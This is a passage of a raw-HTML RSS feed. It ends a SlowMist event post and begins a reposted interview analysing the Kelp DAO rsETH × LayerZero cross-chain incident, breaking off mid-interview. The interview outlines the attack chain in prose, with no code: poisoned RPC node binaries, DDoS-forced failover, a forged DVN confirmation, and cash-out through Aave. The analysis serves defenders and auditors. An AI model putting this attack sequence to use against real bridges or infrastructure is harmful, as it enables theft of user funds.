Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在行业持续演进的过程中，安全不再只是防御手段，而是支撑系统稳定运行与价值流通的基础设施。Hacking Time 的持续举办，正是希望通过开放交流与实践沉淀，推动行业构建更具韧性与可持续性的安全体系。未来，慢雾(SlowMist) 也将继续以技术为驱动，与全球从业者共同推进更加安全、可信的 Web3 生态建设。再次</span></span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;data-start&#34;:&#34;2686&#34;,&#34;data-end&#34;:&#34;2772&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">感谢所有前来交流和参与 Hacking Time 的嘉宾与观众，期待下一次与您再聚！</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">Ps.</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">为便于进一步交流与学习，本次活动部分演讲 PPT 已开放下载，可访问 GitHub 获取：<a href="https://github.com/slowmist/HackingTime_Public/tree/master" target="_blank">https://github.com/slowmist/HackingTime_Public/tree/master</a></span><a class="wx_topic_link" topic-id="mob384bc-nzpsy9" style="color: #576B95 !important;" data-topic="1" data-recommend=""><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">#hacking</span></a><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">-time-%E7%AC%AC%E4%BA%94%E6%9C%9F-20260421</span></span></p></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504741&amp;idx=1&amp;sn=73749cca984e571fbcd6cac83e515423&amp;scene=21#wechat_redirect" textvalue="专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发" data-itemshowtype="0" linktype="text" data-linktype="2">专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504729&amp;idx=1&amp;sn=aa1c7332bba7ac7bbe4f74220e2322e6&amp;scene=21#wechat_redirect" textvalue="解读｜FBI 发布《2025 年互联网犯罪报告》" data-itemshowtype="0" linktype="text" data-linktype="2">解读｜FBI 发布《2025 年互联网犯罪报告》</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504728&amp;idx=1&amp;sn=2e9d14cd251484f86669e24458daafb6&amp;scene=21#wechat_redirect" textvalue="慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504713&amp;idx=1&amp;sn=b3c6dee54d890e1751ac7bb28d28bc74&amp;scene=21#wechat_redirect" textvalue="慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504627&amp;idx=1&amp;sn=9669acd8ecce92eccc5a6c188286510c&amp;scene=21#wechat_redirect" textvalue="暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）" data-itemshowtype="0" linktype="text" data-linktype="2">暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=84444270&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504768%26idx%3D1%26sn%3D4589da9b7bea88de8f7b4dbd5cbfd0c8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 23 Apr 2026 14:56:00 +0800</pubDate>
    </item>
    <item>
      <title>专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504741&amp;idx=1&amp;sn=73749cca984e571fbcd6cac83e515423</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>慢雾科技</span> <span>2026-04-21 12:04</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=4f4e8a99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLQBHibTImib9UPIdBaxY1WshXcLeb7pDeJmtEI9dBso5elmkwl0UUocHf11x9hAOHjmqjIFPcmVApdULcaRR9ZESxGbhQSvNTac%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">本文转载自 </span></span><span data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub 人物专访：<a href="https://techub.info/html_pages/5ccd5646-052a-4530-b6ed-4229bb9b9330.html" target="_blank">https://techub.info/html_pages/5ccd5646-052a-4530-b6ed-4229bb9b9330.html</a></span></span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" data-pm-slice="0 0 []"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">专访人：Techub News</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">受访人：慢雾安全团队</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" data-pm-slice="0 0 []"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">一、开场破题</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 1：请您先⽤⼀句话定义这次 Kelp DAO rsETH × LayerZero 事件，它到底是⼀次单点事故，还是 2026 年 DeFi 系统性⻛险的标志性事件？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是 2026 年迄今最严重的 DeFi 安全事件之⼀，也是⼀次系统性⻛险的集中爆发。它不只是某个合约被盗，⽽是 LRT（流动性再质押代币）、跨链桥、借贷协议三层架构的级联⻛险被同时打穿 —— 单点的 DVN 配置失陷，最终让损失从 Kelp 蔓延到 Aave、再到持有 rsETH 的多个协议。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：如果只能给⼀个标签</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">应该是 &#34;整个 DeFi 乐⾼结构的问题&#34;。跨链桥问题是导⽕索，但 rsETH 作为抵押品被 Aave 等协议⽆条件接受、借贷⻛控没有对 &#34;伪造铸造来源&#34; 设防，这是多层信任假设同时失效的结果。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">二、背景铺垫</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 2：这次到底是代码漏洞，还是更深层的信任配置问题？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这次的根本问题不是代码写错了。LayerZero 的协议本身没有漏洞，rsETH 的合约逻辑也没有被直接 exploit。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">真正被击穿的，是跨链验证机制的信任配置 ——Kelp 的 rsETH OApp 在 LayerZero 上采⽤了 1/1 DVN 配置，即整条跨链路径的安全性完全依赖 LayerZero Labs ⾃⼰运营的单⼀ DVN 节点。⼀旦这个节点被欺骗（⽽⾮被 &#34; 破解 &#34;），伪造消息就可以⽆阻碍通过。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这实际上是⼀个 &#34;单点信任&#34; 问题，⽽不是 &#34;单点代码漏洞&#34; 问题。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：未来安全审计如果只审合约代码，是否已经不够？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完全不够。这次事件表明，审计对象必须从 &#34;合约代码本身&#34; 扩展到 &#34; 跨链参数配置、DVN 选取策略、信任依赖链条 &#34;。⼀份只看 Solidity 代码的审计报告，⽆法告诉你这个协议在跨链层⾯有多脆弱。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">三、时间线复盘：T-10 ⼩时</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 3：攻击者最早在什么时候露出痕迹？T-10 ⼩时左右发⽣了什么？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从链上⾏为来看，攻击者在实施核⼼攻击前进⾏了充分的预备⼯作 —— 包括通过混币器准备 Gas 资⾦、提前踩点⽬标链路。这种有预谋的准备节奏，是职业化攻击团队的典型特征，⽽不是临时发现漏洞后的机会主义操作。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">LayerZero 官⽅公告指出，攻击者事先获取了其 DVN 所依赖的 RPC 节点列表，并成功⼊侵了其中两个独⽴集群上的节点，替换了运⾏ op-geth 的⼆进制⽂件。这些准备⼯作都在攻击实施前悄然完成。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：这种提前准备的⽅式，能看出 APT 式特征吗？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">LayerZero 在事件声明中将此次攻击归因于 Lazarus Group（TraderTraitor 分⽀），即朝鲜国家⽀持的 APT 组织。提前准备 Gas 来源、使⽤混币规避链上溯源、攻击链路精⼼设计为 &#34; 仅对⽬标 DVN IP 返回伪造数据、对其他 IP 返回正常数据，并在攻击完成后⾃毁恶意⼆进制 &#34;—— 这些都是⾼度专业化 APT 组织的典型作战模式，远超普通⿊客的能⼒范围。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">四、时间线复盘：T-0 攻击发⽣</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 4：请把最关键的那⼀笔攻击拆开讲：⿊客到底做了哪⼏步，为什么那条伪造消息能通过？</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击路径⼤致分为以下⼏步：</span></span></p><ol class="list-paddingleft-1"><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⼊侵 RPC 基础设施：攻击者在 Unichain 上替换了 LayerZero Labs DVN 所依赖的 RPC 节点的⼆进制⽂件，使其能够向 DVN 返回伪造的链上状态数据。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DDoS 打掉正常 RPC：对未被控制的正常 RPC 节点发起 DDoS 攻击，强迫 DVN 的请求 failover 到被毒化的节点。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DVN 确认伪造交易：DVN 基于被毒化 RPC 返回的虚假数据，&#34;确认&#34; 了⼀笔实际上从未在链上发⽣的rsETH 铸造 / 发送交易。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Endpoint 执⾏放⾏：LayerZero Endpoint 接受 DVN 认证后，触发 rsETH 的 OFTAdapter 在⽬标链上释放或铸造 rsETH。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">套现离场：攻击者将获得的 rsETH 部分⽤于在 Aave 等借贷协议抵押借出蓝筹资产，完成变现。</span></span></p></li></ol><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: 